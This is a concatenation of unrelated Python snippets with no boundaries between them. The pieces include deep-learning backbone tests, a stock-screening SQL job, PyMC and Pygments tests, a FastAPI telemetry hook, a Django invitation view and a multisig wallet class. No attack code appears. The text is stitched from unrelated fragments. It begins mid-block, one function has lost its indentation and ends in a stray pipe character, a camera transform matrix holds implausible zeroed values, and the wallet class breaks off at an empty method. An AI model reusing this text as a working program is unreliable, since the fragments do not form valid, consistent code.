    LrSchedulerRegistry.register('MultiStep')(torch.optim.lr_scheduler.MultiStepLR)
    LrSchedulerRegistry.register('OneCycle')(torch.optim.lr_scheduler.OneCycleLR)
class CodeManager:
    """Owns a sprite's code blocks and dispatches key / click / broadcast
    events to them."""

    def __init__(self, owner):
        self.code_blocks = {}          # block name -> CodeBlock
        self.key_pressed_blocks = {}   # key -> [block names]
        self.broadcast_blocks = {}     # message -> [block names]
        self.clicked_blocks = []       # blocks triggered by clicking the owner
        self.current_block: CodeBlock = None
        self.owner = owner

    def process_key_pressed(self, key):
        """Start every idle block registered for *key*."""
        for name in self.key_pressed_blocks.get(key, []):
            self.code_blocks[name].start_if_not_running()

    def process_click(self):
        """(Re)start every click-triggered block."""
        for block in self.clicked_blocks:
            block.start_or_restart()

    def process_broadcast(self, message):
        """(Re)start every block subscribed to *message*."""
        for name in self.broadcast_blocks.get(message, []):
            self.code_blocks[name].start_or_restart()

    def register_code_block(self, generator_function, name='', no_refresh=False):
        """Wrap *generator_function* in a CodeBlock, index it by its name, and
        return it."""
        block = CodeBlock(self.owner, generator_function, name, no_refresh=no_refresh)
        self.code_blocks[block.name] = block
        print(f'New code block registered: {block.name}')
        return block

    def _update(self, dt):
        # Advance every block, tracking which one is current while it runs.
        for name in self.code_blocks:
            self.current_block = self.code_blocks[name]
            self.code_blocks[name].update(dt)
def get_sample_fn(params, is_training=False, use_prior=False, reuse=False, output_length=None):
    """Build a sampling closure running the full pipeline:
    sequence encoding -> latent encoding -> latent decoding -> sequence
    decoding. The returned callable maps `inputs` to the final outputs dict.
    """
    def model(inputs):
        encoded = get_singleseq_encoding_model(inputs, params, is_training, reuse)
        latent = get_latent_encoding_model(inputs, encoded, params, is_training, use_prior, reuse)
        decoded = get_latent_decoding_model(inputs, latent, params, is_training, reuse)
        return get_seq_decoding_model(inputs, decoded, params, is_training, reuse, output_length)
    return model
def test_vgg():
    """Smoke-test the VGG backbone: invalid configs raise, and every supported
    depth / out_indices / norm combination yields the expected feature shapes
    for a 1x3x224x224 input."""
    # --- invalid configurations must be rejected -----------------------------
    with pytest.raises(KeyError):
        VGG(18)  # 18 is not a defined VGG depth
    with pytest.raises(AssertionError):
        VGG(11, num_stages=0)
    with pytest.raises(AssertionError):
        VGG(11, num_stages=6)
    with pytest.raises(AssertionError):
        VGG(11, dilations=(1, 1), num_stages=3)  # dilations must match stages
    with pytest.raises(TypeError):
        model = VGG(11)
        model.init_weights(pretrained=0)  # pretrained must be str or None
    # --- norm_eval keeps norm layers frozen even in train mode ---------------
    model = VGG(11, norm_eval=True)
    model.init_weights()
    model.train()
    assert check_norm_state(model.modules(), False)
    # --- VGG-11: all five stage outputs --------------------------------------
    model = VGG(11, out_indices=(0, 1, 2, 3, 4))
    model.init_weights()
    model.train()
    imgs = torch.randn(1, 3, 224, 224)
    feat = model(imgs)
    assert (len(feat) == 5)
    assert (feat[0].shape == (1, 64, 112, 112))
    assert (feat[1].shape == (1, 128, 56, 56))
    assert (feat[2].shape == (1, 256, 28, 28))
    assert (feat[3].shape == (1, 512, 14, 14))
    assert (feat[4].shape == (1, 512, 7, 7))
    # --- VGG-11 with classifier head: extra (1, num_classes) output ----------
    model = VGG(11, num_classes=10, out_indices=(0, 1, 2, 3, 4, 5))
    model.init_weights()
    model.train()
    imgs = torch.randn(1, 3, 224, 224)
    feat = model(imgs)
    assert (len(feat) == 6)
    assert (feat[0].shape == (1, 64, 112, 112))
    assert (feat[1].shape == (1, 128, 56, 56))
    assert (feat[2].shape == (1, 256, 28, 28))
    assert (feat[3].shape == (1, 512, 14, 14))
    assert (feat[4].shape == (1, 512, 7, 7))
    assert (feat[5].shape == (1, 10))
    # --- VGG-11 with BatchNorm: same feature shapes --------------------------
    model = VGG(11, norm_cfg=dict(type='BN'), out_indices=(0, 1, 2, 3, 4))
    model.init_weights()
    model.train()
    imgs = torch.randn(1, 3, 224, 224)
    feat = model(imgs)
    assert (len(feat) == 5)
    assert (feat[0].shape == (1, 64, 112, 112))
    assert (feat[1].shape == (1, 128, 56, 56))
    assert (feat[2].shape == (1, 256, 28, 28))
    assert (feat[3].shape == (1, 512, 14, 14))
    assert (feat[4].shape == (1, 512, 7, 7))
    # --- VGG-11 with BatchNorm and classifier head ---------------------------
    model = VGG(11, num_classes=10, norm_cfg=dict(type='BN'), out_indices=(0, 1, 2, 3, 4, 5))
    model.init_weights()
    model.train()
    imgs = torch.randn(1, 3, 224, 224)
    feat = model(imgs)
    assert (len(feat) == 6)
    assert (feat[0].shape == (1, 64, 112, 112))
    assert (feat[1].shape == (1, 128, 56, 56))
    assert (feat[2].shape == (1, 256, 28, 28))
    assert (feat[3].shape == (1, 512, 14, 14))
    assert (feat[4].shape == (1, 512, 7, 7))
    assert (feat[5].shape == (1, 10))
    # --- VGG-13: only the first three stage outputs --------------------------
    model = VGG(13, out_indices=(0, 1, 2))
    model.init_weights()
    model.train()
    imgs = torch.randn(1, 3, 224, 224)
    feat = model(imgs)
    assert (len(feat) == 3)
    assert (feat[0].shape == (1, 64, 112, 112))
    assert (feat[1].shape == (1, 128, 56, 56))
    assert (feat[2].shape == (1, 256, 28, 28))
    # --- VGG-16 default: single final feature map ----------------------------
    model = VGG(16)
    model.init_weights()
    model.train()
    imgs = torch.randn(1, 3, 224, 224)
    feat = model(imgs)
    assert (feat.shape == (1, 512, 7, 7))
    # --- VGG-19 with classifier: single logits output ------------------------
    model = VGG(19, num_classes=10)
    model.init_weights()
    model.train()
    imgs = torch.randn(1, 3, 224, 224)
    feat = model(imgs)
    assert (feat.shape == (1, 10))
def stat_all_lite_sell(tmp_datetime):
    """Rebuild guess_indicators_lite_sell_daily for one trading day: select
    stocks whose KDJ indicators signal oversold (kdjk<=20, kdjd<=30,
    kdjj<=10) from the daily indicator table and store them, replacing any
    rows previously written for that date."""
    datetime_str = tmp_datetime.strftime('%Y-%m-%d')
    datetime_int = tmp_datetime.strftime('%Y%m%d')
    print('datetime_str:', datetime_str)
    print('datetime_int:', datetime_int)
    # Parameterised query: the %s is bound via pandas read_sql params below.
    sql_1 = '\n SELECT `date`,`code`,`name`,`latest_price`,`quote_change`,`ups_downs`,`volume`,`turnover`,\n `amplitude`,`high`,`low`,`open`,`closed`,`quantity_ratio`,`turnover_rate`,`pe_dynamic`,`pb`,\n `kdjj`,`rsi_6`,`cci`\n FROM stock_data.guess_indicators_daily WHERE `date` = %s \n and kdjk <= 20 and kdjd <= 30 and kdjj <= 10 \n '
    try:
        # NOTE(review): the date comes from strftime so this %-interpolated
        # DELETE is not attacker-controlled, but a parameterised statement
        # would still be safer and consistent with sql_1.
        del_sql = (" DELETE FROM `stock_data`.`guess_indicators_lite_sell_daily` WHERE `date`= '%s' " % datetime_int)
        common.insert(del_sql)
    except Exception as e:
        # Best-effort delete: a missing table/rows should not abort the rebuild.
        print('error :', e)
    data = pd.read_sql(sql=sql_1, con=common.engine(), params=[datetime_int])
    data = data.drop_duplicates(subset='code', keep='last')
    print(' stat_all_lite_sell len data :', len(data))
    try:
        common.insert_db(data, 'guess_indicators_lite_sell_daily', False, '`date`,`code`')
    except Exception as e:
        print('error :', e)
def _name_from_filename(metafile):
(rootdir, basename) = os.path.split(metafile)
if (basename == 'pyproject.toml'):
dirname = os.path.dirname(rootdir)
name = (dirname[3:] if dirname.startswith('bm_') else None)
elif (basename.startswith('bm_') and basename.endswith('.toml')):
name = basename[3:(- 5)]
else:
name = None
return (name, rootdir) |
def get_data():
    """Load the demo RGB-D scene: per-instance npz files, the RGB image, the
    depth map (metres), camera intrinsics and a fixed camera-to-world pose.

    Relies on a module-level ``here`` path object (path.py-style API) for the
    instance files; the other entries are read relative to the working
    directory.
    """
    data = {}
    data['instances'] = []
    for npz_file in sorted((here / 'data').listdir()):
        # BUGFIX: escape the dot -- the old pattern '[0-9]+.npz' also matched
        # names like '12Xnpz' because '.' matched any character.
        if (not re.match(r'[0-9]+\.npz', npz_file.basename())):
            continue
        instance = dict(np.load(npz_file))
        instance['id'] = int(npz_file.basename().stem)
        data['instances'].append(instance)
    data['rgb'] = imgviz.io.imread('data/image.png')
    depth = np.load('data/depth.npz')['arr_0']
    # Depth is stored in millimetres; convert to metres.
    depth = (depth.astype(np.float32) / 1000)
    data['depth'] = depth
    with open('data/camera_info.yaml') as f:
        camera_info = yaml.safe_load(f)
    data['intrinsic_matrix'] = np.array(camera_info['K']).reshape(3, 3)
    data['T_cinematic2world'] = np.array([[0., (- 0.), 0., (- 0.)], [0., 0.166384, (- 0.), 0.3910296], [(- 0.0570783), 0., 0., 0.], [0.0, 0.0, 0.0, 1.0]])
    return data
class Lzma(Codec):
    # numcodecs-style codec wrapping imagecodecs' LZMA encode/decode.
    codec_id = 'imagecodecs_lzma'

    def __init__(self, level=None):
        # Compression preset; None lets imagecodecs choose its default.
        self.level = level

    def encode(self, buf):
        """Compress *buf* with LZMA at the configured level."""
        return imagecodecs.lzma_encode(buf, level=self.level)

    def decode(self, buf, out=None):
        """Decompress *buf*; `_flat(out)` exposes *out* as a flat writable
        buffer for in-place decoding."""
        return imagecodecs.lzma_decode(buf, out=_flat(out))
def f1(items):
    """Macro-averaged F1 over questions.

    *items* is an iterable of (gold, pred, question) triples with 0/1 labels.
    Labels are pooled per question; precision/recall default to 1.0 when the
    corresponding positive count is zero, and questions with P + R == 0 are
    skipped before averaging.
    """
    columns = list(zip(*items))
    gold_positives = defaultdict(list)
    pred_positives = defaultdict(list)
    for gold, pred, question in zip(columns[0], columns[1], columns[2]):
        gold_positives[question].append(gold)
        pred_positives[question].append(pred)
    scores = []
    for question, golds in gold_positives.items():
        preds = pred_positives[question]
        gp = sum(golds)
        pp = sum(preds)
        tp = sum(np.logical_and(golds, preds))
        precision = tp / pp if pp > 0.0 else 1.0
        recall = tp / gp if gp > 0.0 else 1.0
        if precision + recall > 0.0:
            scores.append(2.0 * (precision * recall) / (precision + recall))
    return np.mean(scores)
class TestHalfStudentT(BaseTestDistributionRandom):
    # Reference sampler: |t(df, loc, scale)| draws, matching HalfStudentT(nu, sigma).
    def halfstudentt_rng_fn(self, df, loc, scale, size, rng):
        return np.abs(st.t.rvs(df=df, loc=loc, scale=scale, size=size, random_state=rng))

    pymc_dist = pm.HalfStudentT
    # Parameters given to the PyMC dist and expected on the RV op (1:1 here).
    pymc_dist_params = {'nu': 5.0, 'sigma': 2.0}
    expected_rv_op_params = {'nu': 5.0, 'sigma': 2.0}
    # The same parameters expressed in scipy.stats.t terms for reference draws.
    reference_dist_params = {'df': 5.0, 'loc': 0, 'scale': 2.0}
    reference_dist = (lambda self: ft.partial(self.halfstudentt_rng_fn, rng=self.get_random_state()))
    checks_to_run = ['check_pymc_params_match_rv_op', 'check_pymc_draws_match_reference', 'check_rv_size']
def wait_until_passes(timeout, retry_interval, func, exceptions=Exception, *args, **kwargs):
    """Repeatedly call func(*args, **kwargs) until it stops raising
    *exceptions* or *timeout* (seconds) elapses.

    Sleeps at most *retry_interval* between attempts (never past the
    deadline). On timeout raises a TimeoutError whose `original_exception`
    attribute carries the last failure. Returns func's result on success.
    """
    deadline = timestamp() + timeout
    while True:
        try:
            return func(*args, **kwargs)
        except exceptions as exc:
            remaining = deadline - timestamp()
            if remaining <= 0:
                timeout_err = TimeoutError()
                timeout_err.original_exception = exc
                raise timeout_err
            time.sleep(min(retry_interval, remaining))
def get_nuc(mydf, kpts=None):
    """Nuclear attraction matrix in the AO basis, evaluated on the FFT grid.

    Builds the nuclear potential in reciprocal space from the point charges
    and structure factors, transforms it to real space, and contracts it with
    AO values batch-by-batch for each k-point. Returns a single matrix when
    called with a single k-point, else an array over k-points.
    """
    from pyscf.pbc.dft import gen_grid
    (kpts, is_single_kpt) = _check_kpts(mydf, kpts)
    cell = mydf.cell
    mesh = mydf.mesh
    charge = (- cell.atom_charges())  # electrons feel attractive (negative) charges
    Gv = cell.get_Gv(mesh)
    SI = cell.get_SI(mesh=mesh)
    rhoG = numpy.dot(charge, SI)  # nuclear "charge density" in G space
    coulG = tools.get_coulG(cell, mesh=mesh, Gv=Gv)
    vneG = (rhoG * coulG)
    vneR = tools.ifft(vneG, mesh).real  # potential on the real-space grid
    vne = ([0] * len(kpts))
    for (ao_ks_etc, p0, p1) in mydf.aoR_loop(mydf.grids, kpts):
        ao_ks = ao_ks_etc[0]
        for (k, ao) in enumerate(ao_ks):
            # Accumulate ao^H * V(r) * ao over this batch of grid points.
            vne[k] += lib.dot((ao.T.conj() * vneR[p0:p1]), ao)
        ao = ao_ks = None  # release the grid batch before the next iteration
    if is_single_kpt:
        vne = vne[0]
    return numpy.asarray(vne)
def test_source_add_secondary(tester: CommandTester, source_existing: Source, source_secondary: Source, poetry_with_source: Poetry) -> None:
    """Adding a source with secondary priority must keep the existing source intact."""
    command_line = f'--priority=secondary {source_secondary.name} {source_secondary.url}'
    tester.execute(command_line)
    assert_source_added(tester, poetry_with_source, source_existing, source_secondary)
def test_pbsproscript_generator():
    """The PBS Pro script generator must render a fully-populated job description
    into the exact expected batch script (directives, env export, cwd setup)."""
    jd = rs.job.Description()
    jd.name = 'Test'
    jd.executable = '/bin/sleep'
    jd.arguments = 10
    jd.environment = {'test_env': 15, 'RADICAL_BASE': '/tmp'}
    jd.working_directory = '/home/user'
    jd.output = 'output.log'
    jd.error = 'error.log'
    # POLARIS_PPN / NUM_NODES are module-level constants (presumably 64 and 4,
    # given the 'select=4:ncpus=64' line in the target script -- confirm).
    jd.processes_per_host = POLARIS_PPN
    jd.queue = 'normal-queue'
    jd.project = 'PROJ0000'
    jd.wall_time_limit = 15
    # Site-specific scheduler options pass through as extra '#PBS -l' lines.
    jd.system_architecture = {'options': ['filesystems=grand:home', 'place=scatter']}
    jd.total_cpu_count = (POLARIS_PPN * NUM_NODES)
    jd.total_gpu_count = NUM_NODES
    # Expected output, byte-for-byte (note the trailing space after PBS_O_WORKDIR).
    tgt_script = '\n#!/bin/bash\n\n#PBS -N Test\n#PBS -o /home/user/output.log\n#PBS -e /home/user/error.log\n#PBS -l walltime=0:15:00\n#PBS -A PROJ0000\n#PBS -q normal-queue\n#PBS -l select=4:ncpus=64\n#PBS -l filesystems=grand:home\n#PBS -l place=scatter\n#PBS -v \\"test_env=15\\",\\"RADICAL_BASE=/tmp\\"\n\nexport SAGA_PPN=64\nexport PBS_O_WORKDIR=/home/user \nmkdir -p /home/user\ncd /home/user\n\n/bin/sleep 10\n'
    script = rsapj._script_generator(url=None, logger=mock.Mock(), jd=jd, ppn=1, gres=None, version='', is_cray=False, queue=None)
    assert (script == tgt_script)
def test_validate_regex(db, source_schema, debug=True):
    """Seed, run and test the `public_macros.validating` dbt selection on *db*.

    The same selector is used for all three dbt steps; `source_schema` is passed
    through as a dbt var.  (`debug` is kept for signature compatibility.)
    """
    dbt_vars = {'source_schema': source_schema}
    # The original used f-strings with no placeholders and repeated the literal;
    # hoist it once as a plain string.
    selector = '--select public_macros.validating'
    print(f'Running setup and tests for {db}')
    dbt_seed(selector, db, dbt_vars)
    dbt_run(selector, db, dbt_vars)
    dbt_test(selector, db, dbt_vars)
    print(f'Running tests completed for {db}')
class TestLoadProjectFromConfig:
    """Project.from_config resolution: explicit `projects` mapping first, then `dirs.project` scanning."""

    def test_no_project_no_project_dirs(self, config_file):
        # Nothing configured anywhere -> no project resolved.
        assert Project.from_config(config_file.model, 'foo') is None

    def test_project_empty_string(self, config_file, temp_dir):
        config_file.model.projects[''] = str(temp_dir)
        # An empty project name never resolves, even when mapped.
        assert Project.from_config(config_file.model, '') is None

    def test_project_basic_string(self, config_file, temp_dir):
        # A plain string entry is the project's location.
        config_file.model.projects = {'foo': str(temp_dir)}
        resolved = Project.from_config(config_file.model, 'foo')
        assert resolved.chosen_name == 'foo'
        assert resolved.location == temp_dir

    def test_project_complex(self, config_file, temp_dir):
        # A dict entry carries the location under the 'location' key.
        config_file.model.projects = {'foo': {'location': str(temp_dir)}}
        resolved = Project.from_config(config_file.model, 'foo')
        assert resolved.chosen_name == 'foo'
        assert resolved.location == temp_dir

    def test_project_complex_null_location(self, config_file):
        config_file.model.projects = {'foo': {'location': ''}}
        assert Project.from_config(config_file.model, 'foo') is None

    def test_project_dirs(self, config_file, temp_dir):
        # A directory named after the project inside a configured project dir resolves.
        project_path = temp_dir / 'foo'
        project_path.mkdir()
        config_file.model.dirs.project = [str(temp_dir)]
        resolved = Project.from_config(config_file.model, 'foo')
        assert resolved.chosen_name == 'foo'
        assert resolved.location == project_path

    def test_project_dirs_null_dir(self, config_file):
        config_file.model.dirs.project = ['']
        assert Project.from_config(config_file.model, 'foo') is None

    def test_project_dirs_not_directory(self, config_file, temp_dir):
        # A plain file named like the project must not count as a project dir.
        (temp_dir / 'foo').touch()
        config_file.model.dirs.project = [str(temp_dir)]
        assert Project.from_config(config_file.model, 'foo') is None
def register_event_loop_telemetry(app: FastAPI):
    """Install event-loop latency/backlog telemetry on *app*.

    Registers a startup hook that creates the metrics and kicks off the
    background monitoring task on the running loop.
    """
    # NOTE(review): the decorator line was mangled in the original source
    # ("_event('startup')"); restored as the FastAPI startup hook -- confirm.
    @app.on_event('startup')
    async def add_fastapi_event_loop_monitoring():
        # How long a scheduled callback waits before the loop runs it.
        app.state.fastapi_event_loop_schedule_latency_metrics = metrics.Histogram('anyscale_fastapi_event_loop_schedule_latency', description='Latency of getting yielded control on the FastAPI event loop in seconds', boundaries=_LATENCY_HISTOGRAM_BOUNDARIES, tag_keys=('api_server',))
        app.state.fastapi_event_loop_monitoring_iterations = metrics.Counter('anyscale_fastapi_event_loop_monitoring_iterations', description='Number of times the FastAPI event loop has iterated to get anyscale_fastapi_event_loop_schedule_latency.', tag_keys=('api_server',))
        app.state.fastapi_event_loop_monitoring_tasks = metrics.Gauge('anyscale_fastapi_event_loop_monitoring_tasks', description='Number of outsanding tasks on the FastAPI event loop.', tag_keys=('api_server',))
        tags = {'api_server': _get_app_name(app)}
        # Must run inside the startup hook: get_running_loop() needs a live loop.
        app.state.fastapi_event_loop_schedule_latency_metrics_task = setup_event_loop_monitoring(asyncio.get_running_loop(), app.state.fastapi_event_loop_schedule_latency_metrics, app.state.fastapi_event_loop_monitoring_iterations, app.state.fastapi_event_loop_monitoring_tasks, tags)
def get_default_configs():
    """Baseline training configuration for score-based models on CIFAR-10.

    Returns:
        ml_collections.ConfigDict with `training`, `sampling`, `eval`, `data`,
        `model` and `optim` sub-configs plus a global `seed`.
    """
    config = ml_collections.ConfigDict()

    # --- training ---
    config.training = training = ml_collections.ConfigDict()
    # Was `config.training.batch_size`; use the local alias like every other field.
    training.batch_size = 128
    training.n_iters = 1300001
    training.snapshot_freq = 50000
    training.log_freq = 50
    training.eval_freq = 100
    # Extra frequent snapshots so preempted jobs lose little progress.
    training.snapshot_freq_for_preemption = 10000
    training.snapshot_sampling = True
    training.likelihood_weighting = False
    training.continuous = True
    training.n_jitted_steps = 5
    training.reduce_mean = False

    # --- sampling ---
    config.sampling = sampling = ml_collections.ConfigDict()
    sampling.n_steps_each = 1
    sampling.noise_removal = True
    sampling.probability_flow = False
    sampling.snr = 0.16

    # --- evaluation ---
    config.eval = evaluate = ml_collections.ConfigDict()
    evaluate.begin_ckpt = 9
    evaluate.end_ckpt = 26
    evaluate.batch_size = 1024
    evaluate.enable_sampling = False
    evaluate.num_samples = 50000
    evaluate.enable_loss = True
    evaluate.enable_bpd = False
    evaluate.bpd_dataset = 'test'

    # --- data ---
    config.data = data = ml_collections.ConfigDict()
    data.dataset = 'CIFAR10'
    data.image_size = 32
    data.random_flip = True
    data.centered = False
    data.uniform_dequantization = False
    data.num_channels = 3

    # --- model ---
    config.model = model = ml_collections.ConfigDict()
    model.sigma_min = 0.01
    model.sigma_max = 50
    model.num_scales = 1000
    model.beta_min = 0.1
    model.beta_max = 20.0
    model.dropout = 0.1
    model.embedding_type = 'fourier'

    # --- optimizer ---
    config.optim = optim = ml_collections.ConfigDict()
    optim.weight_decay = 0
    optim.optimizer = 'Adam'
    optim.lr = 0.0002
    optim.beta1 = 0.9
    optim.eps = 1e-08
    optim.warmup = 5000
    optim.grad_clip = 1.0

    config.seed = 42
    return config
class InputFeedRNNDecoder(RNNDecoderBase):
    """RNN decoder with input feeding: each step's input is the target embedding
    concatenated with the previous step's attentional output."""

    def _run_forward_pass(self, tgt, memory_bank, memory_lengths=None, memory_bank_utterance=None, memory_lengths_utterance=None, hier_matrix=None):
        """Step through `tgt` one timestep at a time.

        Returns (dec_state, dec_outs, attns) where `dec_outs` is a list of
        per-step outputs and `attns` collects 'std'/'copy'/'coverage' weights.
        """
        # Previous attentional output, fed back in at every step.
        input_feed = self.state['input_feed'].squeeze(0)
        (input_feed_batch, _) = input_feed.size()
        (_, tgt_batch, _) = tgt.size()
        aeq(tgt_batch, input_feed_batch)
        dec_outs = []
        attns = {}
        if (self.attn is not None):
            attns['std'] = []
        if ((self.copy_attn is not None) or self._reuse_copy_attn):
            attns['copy'] = []
        if self._coverage:
            attns['coverage'] = []
        emb = self.embeddings(tgt)
        emb = self.drop(emb)
        assert (emb.dim() == 3)
        dec_state = self.state['hidden']
        coverage = (self.state['coverage'].squeeze(0) if (self.state['coverage'] is not None) else None)
        # Input feed forces a python loop over timesteps: each step depends on
        # the previous step's attentional output.
        for emb_t in emb.split(1):
            decoder_input = torch.cat([emb_t.squeeze(0), input_feed], 1)
            (rnn_output, dec_state) = self.rnn(decoder_input, dec_state)
            if self.attentional:
                # Hierarchical attention over both memory banks (word- and
                # utterance-level, presumably -- confirm against self.attn).
                (decoder_output, p_attn) = self.attn(rnn_output, memory_bank.transpose(0, 1), memory_lengths=memory_lengths, memory_bank_utterance=memory_bank_utterance.transpose(0, 1), memory_lengths_utterance=memory_lengths_utterance, hier_matrix=hier_matrix)
                attns['std'].append(p_attn)
            else:
                decoder_output = rnn_output
            if (self.context_gate is not None):
                decoder_output = self.context_gate(decoder_input, rnn_output, decoder_output)
            decoder_output = self.drop(decoder_output)
            # This step's output becomes the next step's input feed.
            input_feed = decoder_output
            dec_outs += [decoder_output]
            if self._coverage:
                # Running sum of attention weights.
                coverage = (p_attn if (coverage is None) else (p_attn + coverage))
                attns['coverage'] += [coverage]
            if (self.copy_attn is not None):
                (_, copy_attn) = self.copy_attn(decoder_output, memory_bank.transpose(0, 1))
                attns['copy'] += [copy_attn]
            elif self._reuse_copy_attn:
                # Reuse standard attention as copy attention (shared list).
                attns['copy'] = attns['std']
        return (dec_state, dec_outs, attns)

    def _build_rnn(self, rnn_type, input_size, hidden_size, num_layers, dropout):
        # SRU cells cannot be stepped one timestep at a time as required here.
        assert (rnn_type != 'SRU'), "SRU doesn't support input feed! Please set -input_feed 0!"
        stacked_cell = (StackedLSTM if (rnn_type == 'LSTM') else StackedGRU)
        return stacked_cell(num_layers, input_size, hidden_size, dropout)

    def _input_size(self):
        # Embedding plus the fed-back attentional output.
        return (self.embeddings.embedding_size + self.hidden_size)

    def update_dropout(self, dropout):
        # NOTE(review): updates self.dropout/self.rnn.dropout while the forward
        # pass uses self.drop -- confirm these refer to the same modules.
        self.dropout.p = dropout
        self.rnn.dropout.p = dropout
        self.embeddings.update_dropout(dropout)
def test_formatter_encodings():
    """HtmlFormatter must honour the encoding/outencoding options."""
    from pygments.formatters import HtmlFormatter

    # No encoding configured: unicode in, unicode out.
    formatter = HtmlFormatter()
    rendered = format([(Text, 'a')], formatter)
    assert isinstance(rendered, str)
    assert ('a' in rendered)

    # encoding set: output is bytes in that encoding.
    formatter = HtmlFormatter(encoding='latin1')
    assert ('a'.encode('latin1') in format([(Text, 'a')], formatter))

    # outencoding overrides encoding for the final output step.
    formatter = HtmlFormatter(encoding='latin1', outencoding='utf8')
    assert ('a'.encode() in format([(Text, 'a')], formatter))
class UnderwaterDecorator(ChartDecorator):
    """Fills the chart's area with the (negated) drawdown of a series —
    the classic 'underwater' plot."""

    def __init__(self, series: QFSeries, colors_alpha: float = 1.0, key: str = None):
        super().__init__(key)
        self.series = series
        self._colors_alpha = colors_alpha

    def decorate(self, chart: 'Chart') -> None:
        """Draw the underwater area onto *chart* with a percentage y-axis capped at 0."""
        underwater = drawdown_tms(self.series) * (-1)
        axes = chart.axes
        axes.yaxis.set_major_formatter(PercentageFormatter())
        axes.fill_between(underwater.index, 0, underwater.values, alpha=self._colors_alpha)
        # Drawdowns are non-positive once negated, so clamp the top at zero.
        axes.set_ylim(top=0)
def urdf_add_collision(builder, link, collisions, density, shape_ke, shape_kd, shape_kf, shape_mu):
    """Add each URDF collision geometry (box/sphere/cylinder/mesh) to *builder*
    as a warp shape attached to *link*, with the given contact parameters."""
    for collision in collisions:
        xyz_rpy = urdfpy.matrix_to_xyz_rpy(collision.origin)
        pos = xyz_rpy[0:3]
        rot = wp.quat_rpy(*xyz_rpy[3:6])
        geo = collision.geometry
        # Contact/material parameters shared by every shape kind.
        common = dict(density=density, ke=shape_ke, kd=shape_kd, kf=shape_kf, mu=shape_mu)
        if geo.box:
            # URDF boxes give full extents; the builder wants half-extents.
            builder.add_shape_box(body=link, pos=pos, rot=rot, hx=geo.box.size[0] * 0.5, hy=geo.box.size[1] * 0.5, hz=geo.box.size[2] * 0.5, **common)
        if geo.sphere:
            builder.add_shape_sphere(body=link, pos=pos, rot=rot, radius=geo.sphere.radius, **common)
        if geo.cylinder:
            # Extra 90-degree rotation about y, presumably to convert the URDF
            # cylinder axis to the capsule's axis convention -- confirm.
            swap = wp.quat_from_axis_angle((0.0, 1.0, 0.0), math.pi * 0.5)
            builder.add_shape_capsule(body=link, pos=pos, rot=wp.mul(rot, swap), radius=geo.cylinder.radius, half_width=geo.cylinder.length * 0.5, **common)
        if geo.mesh:
            for m in geo.mesh.meshes:
                vertices = [np.array(v) for v in m.vertices]
                faces = []
                for tri in m.faces:
                    # Flatten the first three indices of each face.
                    faces.extend((int(tri[0]), int(tri[1]), int(tri[2])))
                builder.add_shape_mesh(body=link, pos=pos, rot=rot, mesh=Mesh(vertices, faces), **common)
@login_required  # NOTE(review): decorator garbled as "_required" in source; restored -- confirm
def invite_accept(request, orgslugname):
    """Accept an organization invitation for the logged-in user.

    Removes the org from the user's pending invitations and adds the user to
    the org's members atomically, then redirects to the dashboard.  404 when
    the org doesn't exist or the user was not invited; 500 on bad input or
    database failure.
    """
    if orgslugname == '':
        return HttpResponse(status=500)
    pytitionuser = get_session_user(request)
    try:
        org = Organization.objects.get(slugname=orgslugname)
    except Organization.DoesNotExist:
        raise Http404(_('not found'))
    # Only users actually invited to this org may accept.
    if org not in pytitionuser.invitations.all():
        raise Http404(_('not found'))
    try:
        with transaction.atomic():
            pytitionuser.invitations.remove(org)
            org.members.add(pytitionuser)
    except Exception:
        # Was a bare `except:`; keep the best-effort contract (any DB failure
        # -> HTTP 500) but stop swallowing SystemExit/KeyboardInterrupt.
        return HttpResponse(status=500)
    return redirect('user_dashboard')
class Multisig_Wallet(Deterministic_Wallet):
    """Deterministic m-of-n multisig wallet with one keystore per cosigner.

    Keystores live in the DB under keys 'x1/', 'x2/', ...; 'x1/' is treated as
    the primary keystore (seed, master public key).  Script type is derived
    from the xpub type of the first keystore.
    """

    def __init__(self, db, storage, *, config):
        # wallet_type is e.g. '2of3'; multisig_type parses it into (m, n).
        self.wallet_type = db.get('wallet_type')
        (self.m, self.n) = multisig_type(self.wallet_type)
        Deterministic_Wallet.__init__(self, db, storage, config=config)

    def get_public_keys(self, address):
        """Hex-encoded cosigner pubkeys for *address*."""
        return [pk.hex() for pk in self.get_public_keys_with_deriv_info(address)]

    def pubkeys_to_address(self, pubkeys):
        redeem_script = self.pubkeys_to_scriptcode(pubkeys)
        return bitcoin.redeem_script_to_address(self.txin_type, redeem_script)

    def pubkeys_to_scriptcode(self, pubkeys: Sequence[str]) -> str:
        # Sort pubkeys so every cosigner derives the identical script (BIP-67 style ordering -- confirm).
        return transaction.multisig_script(sorted(pubkeys), self.m)

    def get_redeem_script(self, address):
        """Redeem script for legacy/nested script types; None for native segwit."""
        txin_type = self.get_txin_type(address)
        pubkeys = self.get_public_keys(address)
        scriptcode = self.pubkeys_to_scriptcode(pubkeys)
        if (txin_type == 'p2sh'):
            return scriptcode
        elif (txin_type == 'p2wsh-p2sh'):
            return bitcoin.p2wsh_nested_script(scriptcode)
        elif (txin_type == 'p2wsh'):
            return None
        raise UnknownTxinType(f'unexpected txin_type {txin_type}')

    def get_witness_script(self, address):
        """Witness script for segwit script types; None for plain p2sh."""
        txin_type = self.get_txin_type(address)
        pubkeys = self.get_public_keys(address)
        scriptcode = self.pubkeys_to_scriptcode(pubkeys)
        if (txin_type == 'p2sh'):
            return None
        elif (txin_type in ('p2wsh-p2sh', 'p2wsh')):
            return scriptcode
        raise UnknownTxinType(f'unexpected txin_type {txin_type}')

    def derive_pubkeys(self, c, i):
        # One derived pubkey per cosigner keystore at (change-chain c, index i).
        return [k.derive_pubkey(c, i).hex() for k in self.get_keystores()]

    def load_keystore(self):
        """Load all cosigner keystores; the first one ('x1/') becomes self.keystore."""
        self.keystores = {}
        for i in range(self.n):
            name = ('x%d/' % (i + 1))
            self.keystores[name] = load_keystore(self.db, name)
        self.keystore = self.keystores['x1/']
        # 'standard' xpubs imply legacy p2sh; otherwise use the xpub's own type.
        xtype = bip32.xpub_type(self.keystore.xpub)
        self.txin_type = ('p2sh' if (xtype == 'standard') else xtype)

    def save_keystore(self):
        for (name, k) in self.keystores.items():
            self.db.put(name, k.dump())

    def get_keystore(self):
        return self.keystores.get('x1/')

    def get_keystores(self):
        # Deterministic order ('x1/', 'x2/', ...) for reproducible derivation.
        return [self.keystores[i] for i in sorted(self.keystores.keys())]

    def can_have_keystore_encryption(self):
        return any([k.may_have_password() for k in self.get_keystores()])

    def _update_password_for_keystore(self, old_pw, new_pw):
